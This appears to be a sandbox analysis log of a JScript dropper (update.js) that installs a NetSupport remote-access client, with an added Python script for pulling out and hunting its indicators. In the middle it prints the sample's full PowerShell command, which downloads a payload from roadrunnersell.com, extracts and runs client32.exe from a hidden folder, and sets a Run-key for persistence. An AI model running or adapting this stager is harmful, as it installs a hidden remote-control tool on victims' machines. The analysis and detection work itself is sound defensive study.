Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Roaming\HHIAHYOW-5\NSM.ini
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: update.js | Static file information: File size 6980191 > 1048576
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dll
Source: Binary string: msvcr100.i386.pdb source: client32.exe

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Cont
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HSFB='https://roadrunnersell.com/trade/d.php?5517';$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);$asd = Get-Random -Minimum -5 -Maximum 12; $KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
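The command line above is the whole first stage: fetch base64 text over HTTPS, decode it to a zip, extract it into an %APPDATA% folder named HHIAHYOW plus a random integer, start client32.exe from it, mark the folder hidden, and register the exe as an HKCU Run value. The Python below is an added example written for this report; it is not code from the sample, from NetSupport or from Joe Sandbox. It parses the -C payload exactly as recorded, extracts the URL, folder prefix, Get-Random range, zip and exe names and the Run value name, and expands the suffix range into every folder name the dropper can produce (Get-Random's -Maximum is exclusive, so -5 through 11; this run drew -5, which is why the dropped files and the WZZCVTPAZ Run value later in this section sit under HHIAHYOW-5). The directory listing and Run-value dictionary it checks are constructed sample data; the NetSupport file set is taken from the dropped-file entries below.

```python
"""Static triage of the wscript.exe -> powershell.exe dropper one-liner.

Added example for this report, not code from the sample, NetSupport or Joe
Sandbox. Nothing here touches the network or the registry; all inputs are
embedded strings so it runs offline.
"""
import re
from dataclasses import dataclass

# The -C payload as recorded in the report (split only for readability).
CMDLINE = (
    r"$HSFB='https://roadrunnersell.com/trade/d.php?5517';"
    r"$MAYUBQEXZZV=(New-Object System.Net.WebClient).DownloadString($HSFB);"
    r"$JCHVYBQIUC=[System.Convert]::FromBase64String($MAYUBQEXZZV);"
    r"$asd = Get-Random -Minimum -5 -Maximum 12; "
    r"$KDRZCQQAXE=[System.Environment]::GetFolderPath('ApplicationData')+'\HHIAHYOW'+$asd;"
    r"if (!(Test-Path $KDRZCQQAXE -PathType Container)) { New-Item -Path $KDRZCQQAXE -ItemType Directory };"
    r"$p=Join-Path $KDRZCQQAXE 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$JCHVYBQIUC);"
    r"try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$KDRZCQQAXE)} catch { Write-Host 'Failed: ' + $_; exit};"
    r"$CV=Join-Path $KDRZCQQAXE 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};"
    r"$fd=Get-Item $KDRZCQQAXE -Force; $fd.attributes='Hidden';$s=$KDRZCQQAXE+'\client32.exe';"
    r"$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='WZZCVTPAZ';$ASDASD='String';"
    r"New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;"
)

# Files the report shows powershell.exe extracting into the folder (NetSupport client set).
NETSUPPORT_DROP = {"client32.exe", "PCICL32.DLL", "PCICHEK.DLL", "pcicapi.dll", "HTCTL32.DLL",
                   "TCCTL32.DLL", "remcmdstub.exe", "msvcr100.dll", "NSM.ini"}

# Constructed sample data (not from the report): what a hunter might read back from a host.
SAMPLE_LISTING = ["client32.exe", "PCICL32.DLL", "NSM.ini", "msvcr100.dll", "CXCC.zip"]
SAMPLE_RUN_VALUES = {
    "OneDrive": r"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
    "WZZCVTPAZ": r"C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe",
}


@dataclass
class DropperIocs:
    download_url: str
    folder_prefix: str      # appended to %APPDATA%, before the random integer suffix
    suffix_min: int         # Get-Random -Minimum (inclusive)
    suffix_max: int         # Get-Random -Maximum (exclusive in PowerShell)
    zip_name: str
    exe_name: str
    run_key: str
    run_value_name: str

    def candidate_dirs(self) -> list:
        """Every %APPDATA% folder the dropper can create, not only the one observed."""
        return [f"%APPDATA%\\{self.folder_prefix}{n}" for n in range(self.suffix_min, self.suffix_max)]


def parse_dropper(cmd: str) -> DropperIocs:
    """Extract the hard-coded indicators from the one-liner with targeted regexes."""
    def grab(pattern: str) -> str:
        m = re.search(pattern, cmd)
        if not m:
            raise ValueError(f"pattern not found: {pattern}")
        return m.group(1)
    rnd = re.search(r"Get-Random\s+-Minimum\s+(-?\d+)\s+-Maximum\s+(-?\d+)", cmd)
    if not rnd:
        raise ValueError("Get-Random range not found")
    return DropperIocs(
        download_url=grab(r"='(https?://[^']+)'"),
        folder_prefix=grab(r"GetFolderPath\('ApplicationData'\)\+'\\([^']+)'\+\$\w+"),
        suffix_min=int(rnd.group(1)),
        suffix_max=int(rnd.group(2)),
        zip_name=grab(r"Join-Path \$\w+ '([^']+\.zip)'"),
        exe_name=grab(r"Join-Path \$\w+ '([^']+\.exe)'"),
        run_key=grab(r"\$\w+='(HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run)'"),
        run_value_name=grab(r"CurrentVersion\\Run';\$\w+='(\w+)'"),
    )


def looks_like_netsupport_drop(listing) -> bool:
    """True when a folder holds the NetSupport client core plus its NSM.ini config."""
    names = {n.lower() for n in listing}
    return {"client32.exe", "pcicl32.dll", "nsm.ini"} <= names


def suspicious_run_values(run_values: dict, iocs: DropperIocs) -> list:
    """Names of Run values whose data points into any candidate dropper folder.

    run_values maps value name -> data as read from HKCU\\...\\CurrentVersion\\Run.
    %APPDATA% resolves to <profile>\\AppData\\Roaming, so match on that path tail.
    """
    tails = {d.split("%APPDATA%\\", 1)[1].lower() for d in iocs.candidate_dirs()}
    return [name for name, data in run_values.items()
            if any(f"\\appdata\\roaming\\{t}\\" in data.lower() for t in tails)]


if __name__ == "__main__":
    iocs = parse_dropper(CMDLINE)
    print("stager URL     :", iocs.download_url)
    print("run value      :", f"{iocs.run_key}\\{iocs.run_value_name}")
    print("candidate dirs :", ", ".join(iocs.candidate_dirs()))
    print("netsupport drop:", looks_like_netsupport_drop(SAMPLE_LISTING))
    print("run hits       :", suspicious_run_values(SAMPLE_RUN_VALUES, iocs))
```

The folder name is the part worth sweeping broadly: a hunt keyed only on HHIAHYOW-5 misses the other sixteen names this same one-liner can produce on another host, while the Run value name WZZCVTPAZ and the file set (client32.exe with PCICL32.DLL and NSM.ini under a hidden Roaming folder) are stable across runs of this build.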
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary | 13_2_11029BB0
Source: PCICL32.DLL.10.dr | Static PE information: section name: .hhshare
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8594747 push ds; retf | 10_2_00007FFEC859474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC86D3DE4 push 8B48FFEDh; iretd | 10_2_00007FFEC86D3DE9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC86D6FD9 push ebx; iretd | 10_2_00007FFEC86D6FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8937D20 pushfd ; ret | 10_2_00007FFEC8937D21
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC89383DC push 3BFF97A2h; ret | 10_2_00007FFEC89383E1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8932376 push esp; iretd | 10_2_00007FFEC8932379
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8A98405 push eax; ret | 10_2_00007FFEC8A9840D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8A94F6C pushad ; ret | 10_2_00007FFEC8A94FD4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C76CCF push ebp; ret | 10_2_00007FFEC8C76CD0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C77AD9 push ebx; iretd | 10_2_00007FFEC8C77B2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C71EC9 push es; iretd | 10_2_00007FFEC8C71EEA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C78099 push esp; iretd | 10_2_00007FFEC8C7809A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C70048 push eax; retf | 10_2_00007FFEC8C70049
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C7765F push eax; iretd | 10_2_00007FFEC8C7783A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C77213 push eax; iretd | 10_2_00007FFEC8C7783A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C7040E push ecx; ret | 10_2_00007FFEC8C70419
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C72035 push es; iretd | 10_2_00007FFEC8C7204A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C7022F push ebx; ret | 10_2_00007FFEC8C70230
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C781D9 push ebp; iretd | 10_2_00007FFEC8C781DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C71FB8 push es; iretd | 10_2_00007FFEC8C71FBA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C783B9 push esi; iretd | 10_2_00007FFEC8C783BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C77D46 push esi; ret | 10_2_00007FFEC8C77D67
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 10_2_00007FFEC8C70147 push esp; ret | 10_2_00007FFEC8C70158
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_1116FF15 push ecx; ret | 13_2_1116FF28
Source: msvcr100.dll.10.dr | Static PE information: section name: .text entropy: 6.909044922675825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\remcmdstub.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\pcicapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICHEK.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\HTCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\PCICL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\TCCTL32.DLL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\HHIAHYOW-5\msvcr100.dll
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError | 13_2_11128B10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WZZCVTPAZ
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary | 13_2_11139ED0
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId | 13_2_110C1020
Source: C:\Users\user\AppData\Roaming\HHIAHYOW-5\client32.exe | Code function: 13_2_11113380 IsIconic,GetTickCount | 13_2_11113380
